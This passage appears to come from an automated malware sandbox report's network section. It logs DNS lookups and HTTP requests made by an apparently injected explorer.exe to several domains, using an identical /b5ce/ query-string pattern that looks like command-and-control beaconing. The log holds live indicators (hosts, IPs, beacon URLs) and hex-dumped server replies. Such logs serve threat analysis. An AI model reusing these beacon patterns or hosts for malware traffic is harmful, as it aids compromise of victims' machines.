                                          Sep 27, 2021 17:55:37.653201103 CEST53550468.8.8.8192.168.2.4
                                          Sep 27, 2021 17:55:38.722229958 CEST4961253192.168.2.48.8.8.8
                                          Sep 27, 2021 17:55:38.846456051 CEST53496128.8.8.8192.168.2.4
                                          Sep 27, 2021 17:55:43.865288973 CEST4928553192.168.2.48.8.8.8
                                          Sep 27, 2021 17:55:43.892141104 CEST53492858.8.8.8192.168.2.4
                                          Sep 27, 2021 17:55:48.908591032 CEST5060153192.168.2.48.8.8.8
                                          Sep 27, 2021 17:55:49.096210957 CEST53506018.8.8.8192.168.2.4
                                          Sep 27, 2021 17:55:54.525449038 CEST6087553192.168.2.48.8.8.8
                                          Sep 27, 2021 17:55:54.556010962 CEST53608758.8.8.8192.168.2.4
                                          Sep 27, 2021 17:56:00.082221985 CEST5644853192.168.2.48.8.8.8
                                          Sep 27, 2021 17:56:00.242336988 CEST53564488.8.8.8192.168.2.4
                                          Sep 27, 2021 17:56:06.646498919 CEST5917253192.168.2.48.8.8.8
                                          Sep 27, 2021 17:56:06.681133986 CEST53591728.8.8.8192.168.2.4
                                          Sep 27, 2021 17:56:09.745883942 CEST6242053192.168.2.48.8.8.8
                                          Sep 27, 2021 17:56:09.787056923 CEST53624208.8.8.8192.168.2.4
                                          Sep 27, 2021 17:56:16.813499928 CEST6057953192.168.2.48.8.8.8
                                          Sep 27, 2021 17:56:16.937889099 CEST53605798.8.8.8192.168.2.4

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          Sep 27, 2021 17:55:07.083395958 CEST192.168.2.48.8.8.80x8686Standard query (0)www.lakeefctmich.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 17:55:12.453551054 CEST192.168.2.48.8.8.80x205dStandard query (0)www.josiemaran-supernatural.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 17:55:17.625284910 CEST192.168.2.48.8.8.80x186Standard query (0)www.apexpropertiesltd.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 17:55:22.896137953 CEST192.168.2.48.8.8.80xca11Standard query (0)www.tameka-stewart.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 17:55:28.364178896 CEST192.168.2.48.8.8.80x3350Standard query (0)www.khlopok.clubA (IP address)IN (0x0001)
                                          Sep 27, 2021 17:55:33.564146996 CEST192.168.2.48.8.8.80xad6bStandard query (0)www.tovardarom.xyzA (IP address)IN (0x0001)
                                          Sep 27, 2021 17:55:38.722229958 CEST192.168.2.48.8.8.80xd08aStandard query (0)www.zambiaedu.xyzA (IP address)IN (0x0001)
                                          Sep 27, 2021 17:55:43.865288973 CEST192.168.2.48.8.8.80x7f5eStandard query (0)www.bajajfinservmutualfund.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 17:55:48.908591032 CEST192.168.2.48.8.8.80xcc59Standard query (0)www.lianshangtron.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 17:55:54.525449038 CEST192.168.2.48.8.8.80x1fa1Standard query (0)www.nutritionhawks.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 17:56:00.082221985 CEST192.168.2.48.8.8.80x6578Standard query (0)www.trasportesemmanuel.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 17:56:06.646498919 CEST192.168.2.48.8.8.80xf40Standard query (0)www.novasaude-g1.onlineA (IP address)IN (0x0001)
                                          Sep 27, 2021 17:56:16.813499928 CEST192.168.2.48.8.8.80xc5acStandard query (0)www.studyengland.comA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          Sep 27, 2021 17:55:07.122678995 CEST8.8.8.8192.168.2.40x8686Name error (3)www.lakeefctmich.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 17:55:12.482510090 CEST8.8.8.8192.168.2.40x205dNo error (0)www.josiemaran-supernatural.comjosiemaran-supernatural.comCNAME (Canonical name)IN (0x0001)
                                          Sep 27, 2021 17:55:12.482510090 CEST8.8.8.8192.168.2.40x205dNo error (0)josiemaran-supernatural.com34.102.136.180A (IP address)IN (0x0001)
                                          Sep 27, 2021 17:55:17.665668011 CEST8.8.8.8192.168.2.40x186No error (0)www.apexpropertiesltd.comapexpropertiesltd.comCNAME (Canonical name)IN (0x0001)
                                          Sep 27, 2021 17:55:17.665668011 CEST8.8.8.8192.168.2.40x186No error (0)apexpropertiesltd.com34.102.136.180A (IP address)IN (0x0001)
                                          Sep 27, 2021 17:55:22.922290087 CEST8.8.8.8192.168.2.40xca11No error (0)www.tameka-stewart.comtameka-stewart.comCNAME (Canonical name)IN (0x0001)
                                          Sep 27, 2021 17:55:22.922290087 CEST8.8.8.8192.168.2.40xca11No error (0)tameka-stewart.com184.168.131.241A (IP address)IN (0x0001)
                                          Sep 27, 2021 17:55:28.439892054 CEST8.8.8.8192.168.2.40x3350No error (0)www.khlopok.clubkhlopok.clubCNAME (Canonical name)IN (0x0001)
                                          Sep 27, 2021 17:55:28.439892054 CEST8.8.8.8192.168.2.40x3350No error (0)khlopok.club34.252.217.69A (IP address)IN (0x0001)
                                          Sep 27, 2021 17:55:33.632623911 CEST8.8.8.8192.168.2.40xad6bNo error (0)www.tovardarom.xyztovardarom.xyzCNAME (Canonical name)IN (0x0001)
                                          Sep 27, 2021 17:55:33.632623911 CEST8.8.8.8192.168.2.40xad6bNo error (0)tovardarom.xyz213.5.70.60A (IP address)IN (0x0001)
                                          Sep 27, 2021 17:55:38.846456051 CEST8.8.8.8192.168.2.40xd08aServer failure (2)www.zambiaedu.xyznonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 17:55:49.096210957 CEST8.8.8.8192.168.2.40xcc59No error (0)www.lianshangtron.com103.100.209.77A (IP address)IN (0x0001)
                                          Sep 27, 2021 17:55:54.556010962 CEST8.8.8.8192.168.2.40x1fa1No error (0)www.nutritionhawks.com74.208.236.139A (IP address)IN (0x0001)
                                          Sep 27, 2021 17:56:00.242336988 CEST8.8.8.8192.168.2.40x6578No error (0)www.trasportesemmanuel.com162.241.61.210A (IP address)IN (0x0001)
                                          Sep 27, 2021 17:56:06.681133986 CEST8.8.8.8192.168.2.40xf40No error (0)www.novasaude-g1.online172.67.153.117A (IP address)IN (0x0001)
                                          Sep 27, 2021 17:56:06.681133986 CEST8.8.8.8192.168.2.40xf40No error (0)www.novasaude-g1.online104.21.3.64A (IP address)IN (0x0001)
                                          Sep 27, 2021 17:56:16.937889099 CEST8.8.8.8192.168.2.40xc5acNo error (0)www.studyengland.com209.99.64.43A (IP address)IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • www.josiemaran-supernatural.com
                                          • www.apexpropertiesltd.com
                                          • www.tameka-stewart.com
                                          • www.khlopok.club
                                          • www.tovardarom.xyz
                                          • www.lianshangtron.com
                                          • www.nutritionhawks.com
                                          • www.trasportesemmanuel.com

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.2.44980234.102.136.18080C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 17:55:12.501652956 CEST5828OUTGET /b5ce/?7nqLWRV0=/AI3JQDCZyk/6ubsQmnvJO3EeIaIHb6AvonvM2F4xgXAwnTSleK6/XaIEVHpjjtFOEyF&DJE8X=4hlh3 HTTP/1.1
                                          Host: www.josiemaran-supernatural.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Sep 27, 2021 17:55:12.615387917 CEST5829INHTTP/1.1 403 Forbidden
                                          Server: openresty
                                          Date: Mon, 27 Sep 2021 15:55:12 GMT
                                          Content-Type: text/html
                                          Content-Length: 275
                                          ETag: "6139ed55-113"
                                          Via: 1.1 google
                                          Connection: close
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          1192.168.2.44981834.102.136.18080C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 17:55:17.685591936 CEST5866OUTGET /b5ce/?7nqLWRV0=wzjkW/L/N1XOH+XSD0678S8O9bVA9y0oVtkfQbp3MHT7u8jt+16wQlgR8fjrLlP4MYPZ&DJE8X=4hlh3 HTTP/1.1
                                          Host: www.apexpropertiesltd.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Sep 27, 2021 17:55:17.866120100 CEST5866INHTTP/1.1 403 Forbidden
                                          Server: openresty
                                          Date: Mon, 27 Sep 2021 15:55:17 GMT
                                          Content-Type: text/html
                                          Content-Length: 275
                                          ETag: "614a6c08-113"
                                          Via: 1.1 google
                                          Connection: close
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          2192.168.2.449819184.168.131.24180C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 17:55:23.105173111 CEST5867OUTGET /b5ce/?7nqLWRV0=4jQHwSxHHIZwFcDn9YyiwFwOuX4cum7XsZ3DkRiOKi2AyYToUWCX9nZ4+Axc57SiIQXe&DJE8X=4hlh3 HTTP/1.1
                                          Host: www.tameka-stewart.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Sep 27, 2021 17:55:23.340370893 CEST5867INHTTP/1.1 301 Moved Permanently
                                          Server: nginx/1.20.1
                                          Date: Mon, 27 Sep 2021 15:55:23 GMT
                                          Content-Type: text/html; charset=utf-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Location: https://www.canva.com/design/DAEqGfr3AaI/vRqE8nRm-nYBi3y5_65bMw/view?website#2
                                          Data Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          3192.168.2.44982034.252.217.6980C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 17:55:28.479546070 CEST5868OUTGET /b5ce/?7nqLWRV0=kNxZIWTQx5nCNlvJonIYbJCBQmvVcT2X1CiQyYZ2pQhuEOz9vrAvmQg2dhGIWbuOnxMp&DJE8X=4hlh3 HTTP/1.1
                                          Host: www.khlopok.club
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Sep 27, 2021 17:55:28.520457983 CEST5869INHTTP/1.1 301 Moved Permanently
                                          Date: Mon, 27 Sep 2021 15:55:28 GMT
                                          Server: Apache
                                          X-Frame-Options: SAMEORIGIN
                                          Location: http://khlopok.club/b5ce/?7nqLWRV0=kNxZIWTQx5nCNlvJonIYbJCBQmvVcT2X1CiQyYZ2pQhuEOz9vrAvmQg2dhGIWbuOnxMp&DJE8X=4hlh3
                                          Cache-Control: max-age=86400
                                          Expires: Tue, 28 Sep 2021 15:55:28 GMT
                                          Content-Length: 327
                                          Connection: close
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6b 68 6c 6f 70 6f 6b 2e 63 6c 75 62 2f 62 35 63 65 2f 3f 37 6e 71 4c 57 52 56 30 3d 6b 4e 78 5a 49 57 54 51 78 35 6e 43 4e 6c 76 4a 6f 6e 49 59 62 4a 43 42 51 6d 76 56 63 54 32 58 31 43 69 51 79 59 5a 32 70 51 68 75 45 4f 7a 39 76 72 41 76 6d 51 67 32 64 68 47 49 57 62 75 4f 6e 78 4d 70 26 61 6d 70 3b 44 4a 45 38 58 3d 34 68 6c 68 33 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://khlopok.club/b5ce/?7nqLWRV0=kNxZIWTQx5nCNlvJonIYbJCBQmvVcT2X1CiQyYZ2pQhuEOz9vrAvmQg2dhGIWbuOnxMp&amp;DJE8X=4hlh3">here</a>.</p></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          4192.168.2.449821213.5.70.6080C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 17:55:33.664252996 CEST5870OUTGET /b5ce/?7nqLWRV0=DJnvNV/6mp+JehKrIaw09sUOMJEcD/JystEz9B9fnmezvaywTqAFSPdXHnxiLUzhPCdJ&DJE8X=4hlh3 HTTP/1.1
                                          Host: www.tovardarom.xyz
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Sep 27, 2021 17:55:33.689775944 CEST5871INHTTP/1.1 404 Not Found
                                          Server: nginx/1.18.0 (Ubuntu)
                                          Date: Mon, 27 Sep 2021 15:55:33 GMT
                                          Content-Type: text/html; charset=utf-8
                                          Content-Length: 488
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "5f6c8b3c-1e8"
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 d0 97 d0 b0 d0 bf d1 80 d0 be d1 81 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 20 d0 b8 d0 bb d0 b8 20 d1 83 d0 b4 d0 b0 d0 bb d0 b5 d0 bd 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 62 72 2f 3e 3c 62 72 2f 3e 3c 62 72 2f 3e 0a 20 20 20 20 20 20 20 20 3c 63 65 6e 74 65 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e d0 97 d0 b0 d0 bf d1 80 d0 be d1 88 d0 b5 d0 bd d0 bd d0 b0 d1 8f 20 d1 81 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 d0 b8 d0 bb d0 b8 20 d1 83 d0 b4 d0 b0 d0 bb d0 b5 d0 bd d0 b0 2e 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 3c 2f 63 65 6e 74 65 72 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE html><html lang="ru"> <head> <title>404</title> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta content=" " name="description" /> </head> <body> <br/><br/><br/> <center> <h1> .</h1> </center> </body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          5192.168.2.449843103.100.209.7780C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 17:55:49.292537928 CEST5933OUTGET /b5ce/?7nqLWRV0=WdCn/kPOsGECQ6X5wfp65poK7SwinBwjgfqA8CanQGxQHv6Okf04s3qFBz0DbwV5uzgy&DJE8X=4hlh3 HTTP/1.1
                                          Host: www.lianshangtron.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Sep 27, 2021 17:55:49.488394022 CEST5933INHTTP/1.1 302 Found
                                          Date: Mon, 27 Sep 2021 15:55:49 GMT
                                          Server: Apache/2.4.43
                                          Location: https://www.lianshangtron.com/index.php?s=b5ce/&7nqLWRV0=WdCn/kPOsGECQ6X5wfp65poK7SwinBwjgfqA8CanQGxQHv6Okf04s3qFBz0DbwV5uzgy&DJE8X=4hlh3
                                          Content-Length: 407
                                          Connection: close
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 69 61 6e 73 68 61 6e 67 74 72 6f 6e 2e 63 6f 6d 2f 69 6e 64 65 78 2e 70 68 70 3f 73 3d 62 35 63 65 2f 26 61 6d 70 3b 37 6e 71 4c 57 52 56 30 3d 57 64 43 6e 2f 6b 50 4f 73 47 45 43 51 36 58 35 77 66 70 36 35 70 6f 4b 37 53 77 69 6e 42 77 6a 67 66 71 41 38 43 61 6e 51 47 78 51 48 76 36 4f 6b 66 30 34 73 33 71 46 42 7a 30 44 62 77 56 35 75 7a 67 79 26 61 6d 70 3b 44 4a 45 38 58 3d 34 68 6c 68 33 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 33 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 69 61 6e 73 68 61 6e 67 74 72 6f 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.lianshangtron.com/index.php?s=b5ce/&amp;7nqLWRV0=WdCn/kPOsGECQ6X5wfp65poK7SwinBwjgfqA8CanQGxQHv6Okf04s3qFBz0DbwV5uzgy&amp;DJE8X=4hlh3">here</a>.</p><hr><address>Apache/2.4.43 Server at www.lianshangtron.com Port 80</address></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          6192.168.2.44984474.208.236.13980C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 17:55:54.691708088 CEST5934OUTGET /b5ce/?7nqLWRV0=iJSCg4qWtYnzw4GHWivdfaPpYoJ+2S3Wh/71x72UXIcZgXPac3WPQ9rqQY8gaQxsRQ0f&DJE8X=4hlh3 HTTP/1.1
                                          Host: www.nutritionhawks.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Sep 27, 2021 17:55:55.071660995 CEST5935INHTTP/1.1 301 Moved Permanently
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Date: Mon, 27 Sep 2021 15:55:54 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.4.23
                                          X-LiteSpeed-Tag: 1a0_HTTP.404
                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                          X-Redirect-By: WordPress
                                          Location: http://nutritionhawks.com/b5ce/?7nqLWRV0=iJSCg4qWtYnzw4GHWivdfaPpYoJ+2S3Wh/71x72UXIcZgXPac3WPQ9rqQY8gaQxsRQ0f&DJE8X=4hlh3
                                          Data Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          7192.168.2.449845162.241.61.21080C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 17:56:00.387617111 CEST5936OUTGET /b5ce/?7nqLWRV0=6D/QFG40YKklykWOaHa1RXNEJRP+7L8K6Nslrqzy4UJncL0zvFIM5Fri+7k0NXne0nLY&DJE8X=4hlh3 HTTP/1.1
                                          Host: www.trasportesemmanuel.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Sep 27, 2021 17:56:00.801204920 CEST5937INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 15:56:00 GMT
                                          Server: Apache
                                          Upgrade: h2,h2c
                                          Connection: Upgrade, close
                                          Accept-Ranges: none
                                          Vary: Accept-Encoding
                                          Cache-Control: no-cache, no-store, must-revalidate
                                          Pragma: no-cache
                                          Expires: 0
                                          Transfer-Encoding: chunked
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 33 65 35 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 66 69 6e 64 71 75 69 63 6b 72 65 73 75 6c 74 73 6e 6f 77 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 66 69 6e 64 71 75 69 63 6b 72 65 73 75 6c 74 73 6e 6f 77 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 68 61 6e 64 6c 65 41 42 50 44 65 74 65 63 74 28 29 7b 74 72 79 7b 69 66 28 21 61 62 70 29 20 72 65 74 75 72 6e 3b 76 61 72 20 69 6d 67 6c 6f 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6d 67 22 29 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 72 63 3d 22 68 74 74 70 3a 2f 2f 66 69 6e 64 71 75 69 63 6b 72 65 73 75 6c 74 73 6e 6f 77 2e 63 6f 6d 2f 73 6b 2d 6c 6f 67 61 62 70 73 74 61 74 75 73 2e 70 68 70 3f 61 3d 53 54 4d 76 4d 55 31 4e 55 58 4e 75 63 7a 67 32 61 6d 5a 4f 56 58 46 32 64 57 31 55 4e 48 56 71 61 47 56 5a 4d 44 6c 32 52 33 68 33 57 48 68 57 52 58 46 49 54 6b 6b 33 52 47 56 6c 4d 54 52 56 65 57 51 32 63 58 64 51 61 30 31 47 54 44 6c 47 63 33 56 49 55 33 5a 4f 53 30 5a 33 62 6b 55 79 64 30 70 46 5a 6c 59 30 53 6b 56 47 53 54 64 76 54 33 59 35 56 58 45 78 54 56 68 76 57 55 5a 53 65 6e 5a 43 5a 32 34 72 56 58 46 70 56 48 5a 76 5a 58 70 57 4f 57 39 45 4c 30 4e 78 56 57 30 7a 4f 47 64 4b 64 6c 46 42 65 45 45 3d 26 62 3d 22 2b 61 62 70 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 69 6d 67 6c 6f 67 29 3b 69 66 28 74 79 70 65 6f 66 20 61 62 70 65 72 75 72 6c 20 21 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 20 26 26 20 61 62 70 65 72 75 72 6c 21 3d 22 22 29 77 69 6e 64 6f 77 2e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 3d 61 62 70 65 72 75 72 6c 3b 7d 63 61 74 63 68 28 65 72 72 29 7b 7d 7d 3c 2f 73 63 72 69 70 74 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 69 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 61 3d 27 31 33 30 31 37 27 20 62 3d 27 31 35 30 34 35 27 20 63 3d 27 74 72 61 73 70 6f 72 74 65 73 65 6d 6d 61 6e 75 65 6c 2e 63 6f 6d 27 20 64 3d 27 65 6e 74 69 74 79 5f 